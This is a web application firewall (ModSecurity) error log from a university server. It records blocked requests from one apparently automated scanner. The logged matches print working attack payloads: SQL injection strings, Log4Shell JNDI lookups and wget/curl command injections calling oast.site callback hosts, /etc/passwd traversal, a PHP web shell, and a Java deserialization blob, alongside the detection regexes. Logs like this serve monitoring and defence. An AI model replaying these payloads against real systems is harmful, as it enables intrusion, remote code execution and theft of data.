[Tue Aug 29 11:34:25.532476 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "repositoryfh.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAAT2JPAAAAAz"]
[Tue Aug 29 11:34:26.248078 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAAUDQRUAAAA7"]
[Tue Aug 29 11:34:26.344631 2023] [:error] [pid 1287] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUHKKAAAAA-"]
[Tue Aug 29 11:34:26.383484 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgo7d6nu9shs9md.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUDQRgAAAA7"]
[Tue Aug 29 11:34:27.791703 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUOaSsAAABG"]
[Tue Aug 29 11:34:28.156704 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "repositoryfh.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAATavtYAAAAg"]
[Tue Aug 29 11:34:29.328136 2023] [:error] [pid 1251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlg364fjwpuemy7x.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATjF3gAAAAo"]
[Tue Aug 29 11:34:29.454753 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAATZp4wAAAAf"]
[Tue Aug 29 11:34:29.507120 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATQXgIAAAAO"]
[Tue Aug 29 11:34:30.339540 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgxgjgbcyokup9b.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATxvXMAAAAw"]
[Tue Aug 29 11:34:30.436432 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgn9a4azigqz9ag.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAATZp40AAAAf"]
[Tue Aug 29 11:34:31.427488 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAAUNajYAAABF"]
[Tue Aug 29 11:34:32.320417 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAUOaS0AAABG"]
[Tue Aug 29 11:34:32.327380 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUZcEYAAABO"]
[Tue Aug 29 11:34:33.325430 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAATUxP4AAAAW"]
[Tue Aug 29 11:34:35.334517 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAATzVHYAAAAx"]
[Tue Aug 29 11:34:37.334952 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUKg@8AAABC"]
[Tue Aug 29 11:34:38.316551 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgmsqswxuxnnp7w.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAShCYwAAAAi"]
[Tue Aug 29 11:34:38.333487 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATqf7oAAAAu"]
[Tue Aug 29 11:34:38.439324 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgizyxawhuwj5y1.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAAUXLhwAAABM"]
[Tue Aug 29 11:34:41.313112 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAPDoPQAAAAP"]
[Tue Aug 29 11:34:42.331609 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAUOaTQAAABG"]
[Tue Aug 29 11:34:44.308140 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAShCZAAAAAi"]
[Tue Aug 29 11:34:49.296428 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAATPtRkAAAAM"]
[Tue Aug 29 11:34:49.324005 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAATxvYUAAAAw"]
[Tue Aug 29 11:34:49.333849 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAATlLEsAAAAq"]
[Tue Aug 29 11:34:49.335051 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAUMVNIAAABE"]
[Tue Aug 29 11:34:51.585253 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAPDoPsAAAAP"]
[Tue Aug 29 11:34:52.308198 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAAUIz7sAAABA"]
